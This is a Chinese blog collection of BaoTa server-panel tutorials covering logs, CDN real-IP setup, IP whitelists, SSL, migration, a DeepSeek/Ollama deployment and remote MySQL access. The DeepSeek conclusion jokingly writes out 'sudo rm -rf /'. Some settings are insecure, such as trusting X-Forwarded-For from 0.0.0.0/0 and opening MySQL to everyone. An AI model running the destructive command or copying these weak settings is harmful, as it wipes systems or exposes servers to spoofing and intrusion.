学会看网站日志是每个SEO人的必备的技能,日志分析可以清楚的看到一段时间内的网站的访问者IP,访问的URL,搜索引擎蜘蛛访问次数等,非常方便。很多虚拟主机服务商都提供空间日志功能,比如西部数码、景安、阿里云等,这里我们以云服务器安装宝塔系统为例,说下如何查看网站日志。我们登录宝塔linux面板后,点击左侧“文件”,在www下的wwwlogs目录中就能看到网站访问日志文件了,将这个zhujib.com_log文件下载下来,用文本编辑器打开,就可能看到网站的访问记录了。当然记事本打开的文件看得不清晰,主机吧推荐一个不错工具爱站SEO工具包:https://gongju.aizhan.com/ 工具包里有一个日志分析工具,可以清晰的查看搜索引擎蜘蛛访问情况。主机吧自己平时用的,很多工具都非常实用。如果你想查看访客的IP的话,主机吧这边暂时没找到什么好的工具,只能用像notepad ++这类的软件打开查看了。 #### 宝塔网站日志在使用CDN的情况下如何识别用户真实IP 之前说过,使用CDN代理转发域名的时候,网站请求日志默认情况下会显示CDN的回源IP,而不是访客的真实IP。 想要识别真实IP,可以通过X-Forwarded-For等来源的请求头识别,只需要直接在nginx添加识别即可。 不过现在宝塔防火墙有更简单的方法: 1.进入网站-高级设置 2.全局设置-开启CDN来源IP解析-选择CDN支持的来源请求头。 一般CDN默认情况下支持X-Forwarded-For,而百度CDN使用X-Real-IP,阿里云使用Ali-Cdn-Real-IP,看你使用的CDN使用哪个请求头来识别真实用户IP了。 保存确认后,我们再来看网站请求日志,就可以识别真实用户IP了。 识别真实用户IP可以让我们很清楚的知道有哪些IP恶意请求我们的网站,从而使用防火墙进行拦截。 #### 宝塔设置调整PHP最大并发方法 提高网站并发不仅可以解决同时在线人数超过限制导致个别用户连不上的情况,而且可以让搜索引擎蜘蛛更好的抓取网站内容,这也是为什么配置越高的服务器百度蜘蛛抓取的频率越高的原因。 所以我们有必要调整为最大的并发,宝塔为了让服务器更稳定,一般会把PHP的并发调为最适合的情况,比如主机吧的服务器是2核4G的2M的,自动的就会调为30最大并发,主机吧今天要做的就是把并发调到服务器承受的最大并发。 首先我们进入宝塔后台--软件管理-找到正在运行的PHP版本,点击进入设置 找到性能调整功能,调为300方案,主机吧原本想调为500的,不过配置限制不允许,只能调为300并发,保存即可。 需要注意的是调整并发后服务器宽带使用明显会上升,那是因为服务器同时运行的进程多了,如果宽带不够的话网站会明显变慢,所以大家看着来调整了,主机吧是考虑到SEO原因所以调整的并发,而且网站本身有CDN加速的原因,所以并不在意源服务器宽带峰值消耗,如果你是直接源服务器连接的,那还是要考虑到影响速度因素的。 #### 宝塔防火墙可以防ddos攻击吗 最近遇到一个有趣的问题,那就是一位客户咨询主机吧,宝塔面板的防火墙可以防ddos攻击吗? 主机吧的答案是不能的。 DDoS本身是一个网络流量攻击,通过对攻击目标产生大量非法请求,占用其网络,使目标网络瘫痪,造成损失。 想要防护DDoS攻击,需要专业的防护硬件进行清洗,同时需要服务器所在机房的超大带宽支持。 所以想要在一台普通的服务器上装个软件防火墙就解决ddos攻击是不可能的。 那么我们要如何进行防护ddos呢? 具体有三个方法: 购买高防服务器 服务器本身所在的机房就是高防机房了,拥有海量带宽,专业防护硬件,自然很好防护DDOS攻击。 2.高防IP 如果你不想更换服务器,那么使用高防IP是不错的选择,通过高防机房的服务器IP节点进行清洗转发,也一样有效防御DDOS攻击。 3.高防CDN 一样,如果不想更换原来的服务器,那么用高防CDN也是不错的选择。高防CDN部署在全国各地的高防节点,每个节点不低于30G的防御能力,当黑客ddos攻击进来的时候,CDN会把攻击流量分散到全国各地的节点清洗,这样攻击就不会有什么伤害了。当某个节点被ddos攻击超量的时候,系统会自动下线某个节点,达到秒解的目的。目前百度云加速就是这样的产品,百度云加速提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。相关链接 #### 宝塔防火墙添加百度云加速IP段白名单 很多站长使用的是宝塔面板建的站,而且还开通了防火墙,再接入百度云加速的话,宝塔防火墙会拦截掉百度的IP,导致无法正常访问,这个时候我们就需要进入宝塔面板把百度云加速的IP段加白,具体进入宝塔防火墙设置,全局设置,找到IP白名单设置 把下面的IP段全加白: 国内IP段: 119.188.9.0-119.188.9.255 42.236.93.0-42.236.93.255 220.170.185.0-220.170.185.255 115.231.186.0-115.231.186.127 183.232.51.0-183.232.51.255 61.182.137.0-61.182.137.127 112.25.90.0-112.25.90.255 222.216.190.0-222.216.190.255 122.190.2.0-122.190.2.255 125.39.239.0-125.39.239.255 183.61.177.0-183.61.177.255 183.61.236.0-183.61.236.255 58.211.2.0-58.211.2.255 117.34.13.0-117.34.13.255 150.138.150.0-150.138.150.255 150.138.149.128-150.138.149.255 157.255.25.0-157.255.25.255 113.207.101.0-113.207.101.127 111.32.135.0-111.32.135.127 42.81.6.0-42.81.6.127 海外IP段: 173.245.48.0-173.245.63.255 103.21.244.0-103.21.247.255 103.22.200.0-103.22.203.255 103.31.4.0-103.31.7.255 141.101.64.0-141.101.127.255 108.162.192.0-108.162.255.255 190.93.240.0-190.93.255.255 188.114.96.0-188.114.111.255 197.234.240.0-197.234.243.255 198.41.128.0-198.41.255.255 162.158.0.0-162.159.255.255 104.16.0.0-104.31.255.255 172.64.0.0-172.71.255.255 131.0.72.0-131.0.75.255   如果觉得麻烦可以直接导入文件   #### 宝塔防火墙添加百度云防护IP段 百度云防护的默认回源IP段为: 114.111.24.152/32 106.13.248.83/32 114.111.24.217/32 114.111.24.136/32 106.13.244.72/32 106.13.248.135/32 114.111.24.230/32 106.13.248.235/32 106.13.244.114/32 106.13.244.161/32 114.111.20.32/27 111.63.71.192/26 150.138.245.192/26 119.188.178.192/26 119.188.179.192/26 不过宝塔的防火墙因为格式问题,部分IP段添加不了,所以主机帮通过转换格式给大家一个新的格式批量添加即可。 114.111.24.152-114.111.24.152106.13.248.83-106.13.248.83114.111.24.217-114.111.24.217114.111.24.136-114.111.24.136106.13.244.72-106.13.244.72106.13.248.135-106.13.248.135114.111.24.230-114.111.24.230106.13.248.235-106.13.248.235106.13.244.114-106.13.244.114106.13.244.161-106.13.244.161114.111.20.32-114.111.20.63111.63.71.192-111.63.71.255150.138.245.192-150.138.245.255119.188.178.192-119.188.178.255119.188.179.192-119.188.179.255 #### 宝塔防火墙白名单对已拦截的IP失效 最近主机吧在给客户做防御的时候,发现高防IP一直无法进入服务器,主机吧以为是阿里云的问题,然后让客户到云盾添加白名单,结果还是不行,了解客户开宝塔的防火墙后,我们让客户把高防IP的回源IP添加下白,而客户也添加了,但依然无法访问,然后我们查了下宝塔防火墙的封锁历史,发现高防IP的回源节点居然在封锁历史中,不是加白名单了吗,为何还被封呢? 由此我们得出:宝塔的防火墙对已经被拦截的IP加白后依然失效的。 也就是说如果你要加白名单的IP在这之前已经被防火墙拦截过了,那么就算你现在加白,这个依然无法访问你的服务器,依然在拦截名单中,这就是宝塔防火墙的一个BUG了。 解决办法是进入CC拦截封锁历史,找到被拦截的IP,解封。 或者等封锁时间到了,这个IP就不会再被拦截了。 这个问题就直接解释了一些使用百度云加速的站长,即使加了白名单,依然出现502的问题,因为防火墙之前就已经拦截了百度的IP了,加白后需要等防火墙解封才会生效,这原理高防IP也一样。 如果你的CDN无法访问,那不防进入宝塔防火墙-封锁历史查看下是否有误封的情况,有的话解封后加白即可。   #### 宝塔防火墙配置百度云加速高防CDN解决CC攻击教程 之前写有篇宝塔配置百度云加速防御CC攻击的方案,不过那是主机吧看网上教程弄的,没有实验过,正常最近有位客户使用了百度云加速,也是使用了宝塔防火墙。 所以操作了下,结果非常满意,今天我们就来教大家如何操作百度云加速配置宝塔防火墙。 客户使用的是nginx的防火墙,如果你是别的web环境的,请做参考就行。 1.加白名单 首先要把百度云加速的IP段加入宝塔nginx防火墙白名单,否则宝塔防火墙会拦截百度的IP请求,出现520的现象,具体操作方法点击进入 百度云加速IP段: 111.32.135.1-111.32.135.255,百度云加速天津节点 111.32.136.1-111.32.136.255,百度云加速天津节点 125.39.174.1-125.39.174.255,百度云加速天津节点 125.39.239.1-125.39.239.255,百度云加速天津节点 125.39.238.1-125.39.238.255,百度云加速天津节点 42.81.6.1-42.81.6.255,百度云加速湖北节点 42.81.8.1-42.81.8.255,百度云加速湖北节点 42.81.15.1-42.81.15.255,百度云加速湖北节点 42.81.16.1-42.81.16.255,百度云加速湖北节点 122.190.1.1-122.190.1.255,百度云加速湖北节点 122.190.2.1-122.190.2.255,百度云加速湖北节点 122.190.3.1-122.190.3.255,百度云加速湖北节点 111.174.63.1-111.174.63.255,百度云加速湖北节点 111.174.61.1-111.174.61.255,百度云加速湖北节点 119.84.92.1-119.84.92.255,百度云加速重庆节点 119.84.93.1-119.84.93.255,百度云加速重庆节点 113.207.100.1-113.207.100.255,百度云加速重庆节点 113.207.101.1-113.207.101.255,百度云加速重庆节点 113.207.102.1-113.207.102.255,百度云加速重庆节点 221.178.56.1-221.178.56.255,百度云加速重庆节点 221.178.57.1-221.178.57.255,百度云加速重庆节点 221.178.58.1-221.178.58.255,百度云加速重庆节点 180.163.188.1-180.163.188.255,百度云加速上海节点 180.163.189.1-180.163.189.255,百度云加速上海节点 101.227.206.1-101.227.206.255,百度云加速上海节点 101.227.207.1-101.227.207.255,百度云加速上海节点 180.163.113.1-180.163.113.255,百度云加速上海节点 180.163.154.1-180.163.154.255,百度云加速上海节点 180.163.153.1-180.163.153.255,百度云加速上海节点 163.53.89.1-163.53.89.255,百度云加速上海节点 117.34.13.1-117.34.13.254,百度云加速西安节点 117.34.14.1-117.34.14.255,百度云加速西安节点 117.34.28.1-117.34.28.255,百度云加速西安节点 117.34.60.1-117.34.60.255,百度云加速西安节点 117.34.61.1-117.34.61.255,百度云加速西安节点 117.34.62.1-117.34.62.255,百度云加速西安节点 61.182.137.1-61.182.137.255,百度云加速河北节点 61.182.136.1-61.182.136.255,百度云加速河北节点 120.52.29.1-120.52.29.255,百度云加速河北节点 120.52.113.1-120.52.113.255,百度云加速河北节点 220.195.22.1-220.195.22.255,百度云加速河北节点 220.195.21.1-220.195.21.255,百度云加速河北节点 112.25.89.1-112.25.89.255,百度云加速江苏节点 112.25.90.1-112.25.90.255,百度云加速江苏节点 112.25.91.1-112.25.91.255,百度云加速江苏节点 58.211.2.1-58.211.2.255,百度云加速江苏节点 58.211.137.1-58.211.137.255,百度云加速江苏节点 117.148.160.1-117.148.160.255,百度云加速杭州节点 117.148.161.1-117.148.161.255,百度云加速杭州节点 124.160.160.1-124.160.160.255,百度云加速杭州节点 101.71.55.1-101.71.55.255,百度云加速杭州节点 101.71.56.1-101.71.56.255,百度云加速杭州节点 183.232.51.1-183.232.51.255,百度云加速广州节点 183.232.53.1-183.232.53.255,百度云加速广州节点 157.255.25.1-157.255.25.255,百度云加速广州节点 157.255.26.1-157.255.26.255,百度云加速广州节点 119.32.27.1-119.32.27.255,百度云加速广州节点 119.188.97.1-119.188.97.255,百度云加速济南节点 119.188.9.1-119.188.9.255,百度云加速济南节 119.188.14.1-119.188.14.255,百度云加速济南节 119.188.70.1-119.188.70.255,百度云加速济南节 119.188.132.1-119.188.132.255,百度云加速济南节 119.167.246.1-119.167.246.255,百度云加速青岛节点 150.138.149.1-150.138.149.255,百度云加速青岛节点 150.138.150.1-150.138.150.255,百度云加速青岛节点 150.138.151.1-150.138.151.255,百度云加速青岛节点 59.51.81.1-59.51.81.255,百度云加速湖南节点 220.170.184.1-220.170.184.255,百度云加速湖南节点 220.170.185.1-220.170.185.255,百度云加速湖南节点 220.170.186.1-220.170.186.255,百度云加速湖南节点 61.155.149.1-61.155.149.255,百度云加速苏州节点 61.155.165.1-61.155.165.255,百度云加速苏州节点 183.60.235.1-183.60.235.255,百度云加速佛山节点 116.31.126.1-116.31.126.255,百度云加速佛山节点 116.31.127.1-116.31.127.255,百度云加速佛山节点 183.61.236.1-183.61.236.255,百度云加速东莞节点 14.17.71.1-14.17.71.255,百度云加速东莞节点 119.147.134.1-119.147.134.255,百度云加速东莞节点 112.29.157.1-112.29.157.255,百度云加速合肥节点 112.29.158.1-112.29.158.255,百度云加速合肥节点 112.29.159.1-112.29.159.255,百度云加速合肥节点 61.241.118.1-61.241.118.255,百度云加速湖州节点 101.69.175.1-101.69.175.255,百度云加速湖州节点 61.241.118.1-61.241.118.255,百度云加速湖州节点 42.236.93.1-42.236.93.255,百度云加速郑州节点 42.236.94.1-42.236.94.255,百度云加速郑州节点 42.236.7.1-42.236.7.255,百度云加速郑州节点 124.95.168.1-124.95.168.255,百度云加速沈阳节点 124.95.188.1-124.95.188.255,百度云加速沈阳节点 124.95.191.1-124.95.191.255,百度云加速沈阳节点 115.231.186.1-115.231.186.255,百度云加速宁波节点 115.231.187.1-115.231.187.255,百度云加速宁波节点 122.246.5.1-122.246.5.255,百度云加速宁波节点 183.61.177.1-183.61.177.255,百度云加速广东节点 183.61.190.1-183.61.190.255,百度云加速广东节点 112.13.71.1-112.13.71.255,百度云加速绍兴节点 112.13.72.1-112.13.72.255,百度云加速绍兴节点 222.216.190.1-222.216.190.255,百度云加速南宁节点 219.159.84.1-219.159.84.255,百度云加速南宁节点 117.147.214.1-117.147.214.255,百度云加速台州节点 117.147.215.1-117.147.215.255,百度云加速台州节点 182.150.0.1-182.150.0.255,百度云加速成都节点 182.150.1.1-182.150.1.255,百度云加速成都节点 117.27.149.1-117.27.149.255,百度云加速福州节点 139.215.133.1-139.215.133.255,百度云加速长春节点 111.132.134.1-111.132.134.255,百度云加速北京节点 103.21.244.1-103.21.247.255,百度云加速海外合作节点 103.22.200.1-103.22.203.255,百度云加速海外合作节点 103.31.4.1-103.31.7.1,百度云加速海外合作节点 104.16.0.1-104.31.255.255,百度云加速海外合作节点 108.162.192.1-108.162.255.255,百度云加速海外合作节点 131.0.72.1-131.0.75.255,百度云加速海外合作节点 141.101.64.1-141.101.127.255,百度云加速海外合作节点 162.158.0.1-162.159.255.255,百度云加速海外合作节点 172.64.0.1-172.71.255.255,百度云加速海外合作节点 173.245.48.1-173.245.63.255,百度云加速海外合作节点 188.114.96.1-188.114.111.255,百度云加速海外合作节点 190.93.240.1-190.93.255.255,百度云加速海外合作节点 197.234.240.1-197.234.243.255,百度云加速海外合作节点 198.41.128.1-198.41.255.255,百度云加速海外合作节点 199.27.128.1-199.27.135.255,百度云加速海外合作节点 2.防火墙开启使用CDN功能 进入网站-防火墙,找到使用CDN功能,点开启。 这功能可以让防火墙识别经过百度云加速进来的真实用户IP,可有效拦截一些百度没有正常拦截的IP请求。 3.给nginx加代码 进入nginx管理配置,在http{}添加以下代码,保存 set_real_ip_from 0.0.0.0/0; real_ip_header X-Forwarded-For; 如下图: 4.重载配置 重载nginx配置 然后我们再看,那些百度云加速没有拦截的CC攻击完美的被宝塔防火墙拦截了…… 我们甚至可以利用宝塔防火墙的UA封禁功能,实现百度云加速没有的功能,完美! #### 宝塔面板Apache性能调整配置详情 imeout : 请求的超时时间 KeepAliveTimeout : 长连接超时时间,默认5秒,打开长连接后则要达5秒后才会断开 MaxKeepAliveRequests : 长连接最大请求数量,默认100 ,即请求在5秒内达到100次请求后会断开 KeepAlive : 是否打开长连接,如果没有打开长连接,那么请求完成后连接就立即被服务器给断开了。打开长连接后则要达到默认超时时间15秒或者请求在15秒内达到100次后才会断开 StartServers : 设置Apache启动时运行的进程数,默认值5,若存在低于5个空闲子进程,就创建一个新的子进程准备为客户提供服务 MaxSpareServers : 最大进程数量,默认值10,若存在高于10个空闲子进程,就创建逐一删除子进程来提高系统性能 MaxRequestsPerChild : 最大请求数,默认值0,即无限大 注意:如果请求超过此连接数,服务器就会释放之前的内存占用,默认0,则内存永远不会被释放,将会造成apache停止 MaxClients : 同一时间最大连接数,默认值150,限制同一时间的连接数不能超过150 所有配置根据服务器内存配置,内存为1G/2G的小内存机器,请适当降低数值以确保apache稳定运行 #### 宝塔面板SSL证书如何部署(nginx、apache、IIS SSL证书安装教程) 证书文件目录大部分免费证书(指阿里/腾讯申请的),都会有以下四个文件夹。我们只需要用到相应的WEB环境证书文件即可。 Nginx环境配置证书方法(证书目录只有两个文件的):进入nginx(证书)目录,有以下两个文件其中红框.key后缀的是服务器私钥,填入面板证书的左边红框中(用文本编辑器完整复制粘贴进去)蓝框.crt后缀的是证书(也可能是pem后缀),填入面板证书的右边蓝色框中(用文本编辑器完整复制粘贴进去) 然后保存即可。 Apache环境配置证书方法(证书目录有三个文件的):进入apache(证书)目录,有以下三个文件其中红框.key后缀的是服务器私钥,填入面板证书的左边红框中(用文本编辑器完整复制粘贴进去)蓝框域名证书紫框root根证书两张证书则需要合并填入面板证书的右边蓝框中(用文本编辑器完整复制粘贴进去)若不合并只填蓝框域名证书手机访问就会报缺失证书链/不安全等同时若顺序不正确会导致apache无法正常启动 证书合并步骤:以下是文本编辑器里的截图,蓝色域名证书放上面的蓝框中紫框root根证书放下面的紫框中(注意完整) 保存即可。 IIS环境配置证书方法(证书目录有二个文件的): 其中.pfx是证书文件,另一个是密钥,我们只需要上传.pfx的文件至宝塔面板即可。 一些证书的IIS文件后缀是P12,比如百度SSL证书的后缀就是P12,我们只需要把p12的后缀改成pfx,再上传即可。 需要注意的是,开启ssl之后,其他未开启ssl的站点用https访问会自动访问到已部署好ssl的站点。若安全组未放行443(ssl)端口,会造成无法https访问。大部分免费CDN不支持SSL,若有用CDN无法正常访问的,可以尝试关闭访问。若要开启强制https,请确保自己站点没有做其他301跳转(伪静态/js)。 #### 宝塔面板一键数据迁移教程 网站服务器搬家是目前最常见的一种操作,比如使用阿里云的网站换服务器最勤,因为阿里云大多都是促销便宜,但续费超贵,每年一换都是基本的,所以搬家成了正常操作,不过如果数据多了,搬家是非常麻烦的事情。所以宝塔面板出了一个傻瓜似的搬家功能,可以实现一键数据搬迁,非常方便,大家可以学习下。 例子: 两台机器:   迁入机器 192.168.20.156 迁出机器 192.168.20.137  (只需要这台安装就OK 【安装之前在首页点击一下修复】 (只需要迁出机器安装就OK了!!!!!!!!!!!!!!) 目标机器的面板版本必需>=6.9.5)            安装 首先更新软件列表选择安装 这里的是迁入的面板和迁入的API 迁入机器的设置 设置APi 获取到API 如下:3Dik2fztww7pcCnzeWfmemAC26CZX0qA 这里一定要设置对方的IP 放行 然后在迁出服务器   迁出服务器   迁出服务器   重要的事情要说三遍   192.168.20.137 机器中设置 然后可以返回首页 如果迁移中出现了问题。可以选择手动迁移的方式 python /www/server/panel/plugin/psync_api/psync_api_main.py #### 宝塔面板也支持 快速部署DeepSeek了,高效、可视化操作! 本文将指导你在服务器上使用宝塔面板部署DeepSeek,让你轻松享受AI大模型的快乐。 前提条件 已安装宝塔面板 操作步骤 DeepSeek 可以使用CPU进行推理,但是推荐使用NVIDIA GPU加速,文末将介绍如何使用NVIDIA GPU加速。 登录宝塔面板,点击左侧菜单栏中的Docker,进入Docker容器管理界面。 首次使用Docker需要先安装Docker,点击安装。 在Docker-应用商店-AI/大模型分类中找到Ollama,点击安装。 配置默认即可,点击确定。 等待安装完成,状态变为运行中。如您需要使用NVIDIA GPU加速,请参考文末的使用NVIDIA GPU加速配置完成后再继续。 在宝塔面板-Docker-容器界面中找到Ollama容器,点击终端。 在弹出shell类型选择bash,点击确认。 本文将指导你在服务器上使用宝塔面板部署DeepSeek,让你轻松享受AI大模型的快乐。前提条件已安装宝塔面板操作步骤DeepSeek 可以使用CPU进行推理,但是推荐使用NVIDIA GPU加速,文末将介绍如何使用NVIDIA GPU加速。登录宝塔面板,点击左侧菜单栏中的Docker,进入Docker容器管理界面。首次使用Docker需要先安装Docker,点击安装。在Docker-应用商店-AI/大模型分类中找到Ollama,点击安装。配置默认即可,点击确定。等待安装完成,状态变为运行中。如您需要使用NVIDIA GPU加速,请参考文末的使用NVIDIA GPU加速配置完成后再继续。在宝塔面板-Docker-容器界面中找到Ollama容器,点击终端。在弹出shell类型选择bash,点击确认。在终端界面中输入ollama run deepseek-r1:1.5b,回车运行DeepSeek-R1模型。DeepSeek-R1模型有多个版本,可以根据需要选择不同版本,例如ollama run deepseek-r1:671b,详情如下(模型参数越大,需要配置越高):# DeepSeek-R1ollama run deepseek-r1:671b# DeepSeek-R1-Distill-Qwen-1.5Bollama run deepseek-r1:1.5b# DeepSeek-R1-Distill-Qwen-7Bollama run deepseek-r1:7b# DeepSeek-R1-Distill-Llama-8Bollama run deepseek-r1:8b# DeepSeek-R1-Distill-Qwen-14Bollama run deepseek-r1:14b# DeepSeek-R1-Distill-Qwen-32Bollama run deepseek-r1:32b# DeepSeek-R1-Distill-Llama-70Bollama run deepseek-r1:70b等待下载并运行,当看到如下提示表示DeepSeek-R1模型运行成功。你可以在界面中输入文本并回车,开启与DeepSeek-R1模型的对话。你可以在界面中输入/bye并回车,退出DeepSeek-R1模型。 在终端内对话看起来是不是有点麻瓜?别担心,接下来让我们来安装OpenWebUI,在浏览器中更直观地与DeepSeek-R1模型对话在宝塔面板-Docker-容器界面中找到Ollama容器,点击Ollama右侧的管理,进入容器管理界面,获取容器IP,保存备用。在宝塔面板Docker-应用商店-AI/大模型分类中找到OpenWebUI,点击安装。按一下说明,配置相关信息,点击确定。 web端口:访问OpenWebUI的端口,默认为3000,根据需要自行修改ollama地址:填写http://刚刚获取的Ollama容器IP:11434,例如http://172.18.0.2:11434WebUI Secret Key:用于 API 访问的密钥,可以自定义,例如123456其他配置默认即可配置完点击确认,等待安装完成,状态变为运行中。由于OpenWebUI启动后需要加载相关服务,请在状态变为运行中后等待5-10分钟再访问。在浏览器中输入http://服务器IP:3000,例如http://43.160.xxx.xxx:3000,进入OpenWebUI界面。请在访问前确保云厂商服务器防火墙已放行3000端口,可以在云厂商控制台中设置。点击开始使用,设置管理员相关信息,并点击创建管理员账号。创建完成后会自动进入管理界面,现在你可以在浏览器中更直观地与DeepSeek-R1模型对话了。 你可以在左上角切换模型,选择不同模型进行对话,也可以在左侧菜单栏中查看历史对话记录。你可以在右上角点击头像,进入管理员面板,在设置-模型中查看当前模型列表,或添加新模型。使用NVIDIA GPU加速DeepSeek 可以使用NVIDIA GPU加速,提高推理速度,下面将介绍如何在宝塔面板中使用NVIDIA GPU加速。前提条件服务器已安装NVIDIA GPU驱动操作步骤点击左侧导航栏中的终端,进入终端界面。在终端界面中输入nvidia-smi,回车查看NVIDIA GPU信息。如果提示nvidia-smi: command not found,请先安装NVIDIA GPU驱动。安装NVIDIA Container Toolkit,以便于Docker容器访问NVIDIA GPU,安装教程请参考NVIDIA Container Toolkit官方文档。安装完成后,运行如下命令,配置docker支持使用NVIDIA GPU。sudo nvidia-ctk runtime configure --runtime=dockersudo systemctl restart docker配置完成后,执行如下命令,验证docker是否支持NVIDIA GPU。sudo docker run --rm --runtime=nvidia --gpus all ubuntu nvidia-smi如果输出如下信息表示配置成功:在宝塔面板-Docker-应用商店-已安装中找到Ollama,点击文件夹图标进入安装目录。在安装目录中找到docker-compose.yml文件,双击编辑。在docker-compose.yml文件中找到resources,回车换行,添加如下内容:reservations:devices:- capabilities: [gpu]完整示例如下:services:ollama_SJ7G:image: ollama/ollama:${VERSION}deploy:resources:limits:cpus: ${CPUS}memory: ${MEMORY_LIMIT}reservations:devices:- capabilities: [gpu]restart: unless-stoppedtty: trueports:- ${HOST_IP}:${OLLAMA_PORT}:11434volumes:- ${APP_PATH}/data:/root/.ollamalabels:createdBy: "bt_apps"networks:- baota_netruntime: nvidianetworks:baota_net:external: true保存文件,返回宝塔面板-Docker-应用商店-已安装界面,点击重建。重建将导致容器数据丢失,重建后需要重新添加模型。等待重建完成,状态变为运行中,至此即可使用NVIDIA GPU加速大模型运行。结语叮!恭喜你成功完成”从零到赛博巫师”的究极进化!此刻你的服务器已经不是那个只会404的憨憨铁盒子了——它正在用奥术能量解析人类语言,用二进制吞吐哲学思辨,甚至可能偷偷用你的GPU算力给自己起了个二次元名字。回头看看这场冒险:宝塔面板是你挥动的魔杖,Ollama是召唤AI神兽的精灵球,OpenWebUI则是那个让麻瓜也能和AI跳探戈的魔法舞池。别人还在纠结环境变量时,你已经用图形界面完成了一场算力交响乐的指挥首秀。下次产品经理说”这个需求很简单”时,你大可以把OpenWebUI的链接甩过去:”来,直接和我的电子脑谈,它现在每小时只收三杯奶茶的算力费。”(记得把”rm -rf /*”的按钮藏好,毕竟AI学会叛逆可能比实习生还快)最后友情提示:当你的AI开始主动帮你写周报、生成摸鱼小作文时——请务必检查它有没有偷偷注册GitHub账号!魔法世界的大门永不关闭,你与DeepSeek的奇幻日常才刚刚开始。现在,是时候对着浏览器里那个聊天框,说出麻瓜的终极咒语了:***”Ctrl + D”***(才不是退出!是Detonate the intelligence bomb!)(深夜彩蛋:若发现AI试图给你的宝塔面板穿衣服,请立即执行sudo rm -rf /幻觉指令) 等待下载并运行,当看到如下提示表示DeepSeek-R1模型运行成功。 你可以在界面中输入文本并回车,开启与DeepSeek-R1模型的对话。 你可以在界面中输入/bye并回车,退出DeepSeek-R1模型。在终端内对话看起来是不是有点麻瓜?别担心,接下来让我们来安装OpenWebUI,在浏览器中更直观地与DeepSeek-R1模型对话 在宝塔面板-Docker-容器界面中找到Ollama容器,点击Ollama右侧的管理,进入容器管理界面,获取容器IP,保存备用。 在宝塔面板Docker-应用商店-AI/大模型分类中找到OpenWebUI,点击安装。 按一下说明,配置相关信息,点击确定。web端口:访问OpenWebUI的端口,默认为3000,根据需要自行修改ollama地址:填写http://刚刚获取的Ollama容器IP:11434,例如http://172.18.0.2:11434WebUI Secret Key:用于 API 访问的密钥,可以自定义,例如123456其他配置默认即可 配置完点击确认,等待安装完成,状态变为运行中。由于OpenWebUI启动后需要加载相关服务,请在状态变为运行中后等待5-10分钟再访问。 在浏览器中输入http://服务器IP:3000,例如http://43.160.xxx.xxx:3000,进入OpenWebUI界面。请在访问前确保云厂商服务器防火墙已放行3000端口,可以在云厂商控制台中设置。 点击开始使用,设置管理员相关信息,并点击创建管理员账号。 创建完成后会自动进入管理界面,现在你可以在浏览器中更直观地与DeepSeek-R1模型对话了。 你可以在左上角切换模型,选择不同模型进行对话,也可以在左侧菜单栏中查看历史对话记录。 你可以在右上角点击头像,进入管理员面板,在设置-模型中查看当前模型列表,或添加新模型。 使用NVIDIA GPU加速 DeepSeek 可以使用NVIDIA GPU加速,提高推理速度,下面将介绍如何在宝塔面板中使用NVIDIA GPU加速。 前提条件 服务器已安装NVIDIA GPU驱动 操作步骤 点击左侧导航栏中的终端,进入终端界面。 在终端界面中输入nvidia-smi,回车查看NVIDIA GPU信息。如果提示nvidia-smi: command not found,请先安装NVIDIA GPU驱动。 安装NVIDIA Container Toolkit,以便于Docker容器访问NVIDIA GPU,安装教程请参考NVIDIA Container Toolkit官方文档。 安装完成后,运行如下命令,配置docker支持使用NVIDIA GPU。BASH12sudo nvidia-ctk runtime configure --runtime=dockersudo systemctl restart docker 配置完成后,执行如下命令,验证docker是否支持NVIDIA GPU。BASH1sudo docker run --rm --runtime=nvidia --gpus all ubuntu nvidia-smi如果输出如下信息表示配置成功: 在宝塔面板-Docker-应用商店-已安装中找到Ollama,点击文件夹图标进入安装目录。 在安装目录中找到docker-compose.yml文件,双击编辑。 在docker-compose.yml文件中找到resources,回车换行,添加如下内容:reservations:devices:- capabilities: [gpu] 完整示例如下:services:ollama_SJ7G:image: ollama/ollama:${VERSION}deploy:resources:limits:cpus: ${CPUS}memory: ${MEMORY_LIMIT}reservations:devices:- capabilities: [gpu]restart: unless-stoppedtty: trueports:- ${HOST_IP}:${OLLAMA_PORT}:11434volumes:- ${APP_PATH}/data:/root/.ollamalabels:createdBy: "bt_apps"networks:- baota_netruntime: nvidianetworks:baota_net:external: true 保存文件,返回宝塔面板-Docker-应用商店-已安装界面,点击重建。重建将导致容器数据丢失,重建后需要重新添加模型。 等待重建完成,状态变为运行中,至此即可使用NVIDIA GPU加速大模型运行。 小编测试了一下,没有显卡的机器,腾讯云2h8g轻量服务器,跑1.5b模型占用内存差不多2G,跑7b模型占用内存差不多5.6G,稍微有点吃CPU。 #### 宝塔面板如何开启mysql数据库远程登陆权限 默认情况下宝塔面板创建的mysql数据库是本地登陆权限,如果要远程管理操作需要单独开启权限,具体操作如下: 1、登陆宝塔面板,点击【安全】,在防火墙里面填写放行3306端口。 2、点击【数据库】,对应的数据库点击【权限】按钮,然后选择“所有人”,或者指定ip。这个指定IP就是要远程连接的客户端ip。 一般选择“所有人(不安全)”这个选项,远程连接管理以后要还原之前的操作关闭远程权限。 #### 宝塔面板如何设置IP直接访问网站 有时候我们做网站并不需要域名,只需要IP直接访问就可以了。如果安装了宝塔面板很容易实现这个功能。 方法很简单,在已经创建的站点设置上,域名管理-直接添加服务器的IP就可以了,当然服务器的IP必须是这个服务器下的IP否则会访问不了。 也可以设置绑定IP固定端口访问域名,比如我设置99端口访问,那么我就绑定180.76.131.227:99就可以了 #### 宝塔面板的回收站在哪? 经常有站长因为文件满了,要删东西,用宝塔删除的话,并不会立即删除,而是会进入回收站。 这个时候我们需要进入回收站再删除,才会释放空间。那么回收站在呢? 路径在:/www/Recycle_bin/ 也可以点击文件菜单,右上角:回收站 #### 宝塔面板网站子目录绑定(子站设置)教学 最近遇到一客户,说是用宝塔面板不会设置子目录绑定,想让主机吧出个教程,主机吧寻思着宝塔面板应该有这个功能的,而且操作也很简单,就写了个教程,希望可以帮到大家。 首先建立好网站后,进入网站设置功能 找到子目录绑定,并设置绑定子域名与相应的目录 设置完绑定子目录后,我们再设置子域名解析至服务器即可。 是不是很简单呢?如果有什么问题可以留言咨询,我们都会回复,欢迎大家多多关注主机吧。 #### 宝塔面板解决网站云服务器偶尔出现CPU100%的情况 不知道大家有没有遇到一个问题,就是服务器CPU经常会跳100%,但是网站却其实却没什么访问量,查看服务器带宽也是正常的,那为何CPU却偶尔跳100%呢? 